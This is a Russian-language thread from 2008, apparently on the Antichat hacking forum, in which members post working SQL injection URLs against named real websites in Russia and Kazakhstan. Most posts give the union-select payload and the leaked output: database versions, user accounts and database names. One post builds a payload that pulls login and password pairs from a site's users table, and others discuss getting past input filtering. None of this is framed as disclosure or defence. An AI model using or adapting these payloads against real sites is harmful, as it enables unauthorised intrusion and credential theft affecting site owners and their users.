ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5041  
Старый 08.03.2008, 15:53
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Передаю привет компании НИНСИС

http://www.avapeter.ru/content.php?id=3&iddop=-5'+union+select+version()/*
\4.1.22-log:root@localhost:dbava\
нашел, смотрю в низу кто наваял сайт.. в итоге вот что:

http://www.ninsis.ru/content.php?id=-15'+union+select+version()/*

\4.1.22-log:root@localhost:dbninsis\
хотя, может ничего страшного =\
ninsis.ru/content.php?id=50 список клиентов
===================================

еще один пламенный привет Global Site Group

http://g-site.ru/portfolio.php?id=-162+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.22-standard:gsgroup_super@global.globalsitegroup.ru:g sgroup_toli

таблички некогда подбирать =\

Последний раз редактировалось xcedz; 08.03.2008 в 17:52..
 
Ответить с цитированием

  #5042  
Старый 08.03.2008, 18:06
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.paradigma.kz/index.php?part=info&article_type_id=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8,9,10,11,12,13+/*

u10639@10.10.223.223
5.0.45-log
u10639
 
Ответить с цитированием

  #5043  
Старый 08.03.2008, 18:25
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

truelamer
В антибояне её нет ,а тут есть:
google
paradigma.kz site:forum.antichat.ru
так что 11100000
 
Ответить с цитированием

  #5044  
Старый 08.03.2008, 18:25
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.sbornaya.kz/news/view/?newsid=-1+union+select+1,2,3,4,5,6,7,8,aes_decrypt(aes_enc rypt(concat(version(),char(58),user(),char(58),dat abase()),1),1),10,11,12,13,14,15+/*

4.1.13
sbornaya@server5.barik.pp.ru
sbornaya
 
Ответить с цитированием

  #5045  
Старый 08.03.2008, 18:37
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

http://www.beton.ru/center.php?chp=showpage&parent=799&num=
1+union+select+1,2,3333333,4,5,66666,7,8,9,10,11/*

эх фильтрация

Последний раз редактировалось ZET36; 08.03.2008 в 18:40..
 
Ответить с цитированием

  #5046  
Старый 08.03.2008, 19:00
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.loverland.ru/addbasket.php?action=add&id=-1+union+select+concat(user(),char(58),version(),ch ar(58),database())/*

loverland@localhost
5.0.41
loverland
 
Ответить с цитированием

  #5047  
Старый 08.03.2008, 19:07
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Цитата:
Сообщение от ZET36  
http://www.beton.ru/center.php?chp=showpage&parent=799&num=
1+union+select+1,2,3333333,4,5,66666,7,8,9,10,11/*

эх фильтрация

http://www.beton.ru/center.php?chp=showpage&parent=799&num=%20%201+uni on+select+1,2,aes_decrypt(aes_encrypt(concat(versi on(),char(58),database(),char(58),user()),1),1),4, 5,66666,7,8,9,10,11/*

4.1.15mysql-other-log
beton
beton@10.248.34.9

http://www.beton.ru/center.php?chp=showpage&parent=799&num=%20%201+uni on+select+1,2,concat(login,char(58),password),4,5, 66666,7,8,9,10,11+from+users+limit+0,1+/*

Последний раз редактировалось truelamer; 08.03.2008 в 19:15..
 
Ответить с цитированием

  #5048  
Старый 08.03.2008, 19:08
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

truelamer
ты издеваешься что-ли?
Твой-же пост
_http://forum.antichat.ru/showpost.php?p=611481&postcount=5072
_http://forum.antichat.ru/showpost.php?p=611487&postcount=5073
Это тоже баян
_http://forum.antichat.ru/showpost.php?p=536081&postcount=4190
 
Ответить с цитированием

  #5049  
Старый 08.03.2008, 19:25
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Все ошибку понял теперь буду повнимательней
 
Ответить с цитированием

  #5050  
Старый 08.03.2008, 19:30
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748

Репутация: 137
По умолчанию

truelamer
хех а
http://www.beton.ru/center.php?chp=showpage&parent=799&num=1+union+sel ect+1,2,database(),4,5,6,7,8,9,10,11/*
выполнить неполучается

Последний раз редактировалось ZET36; 08.03.2008 в 19:34..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ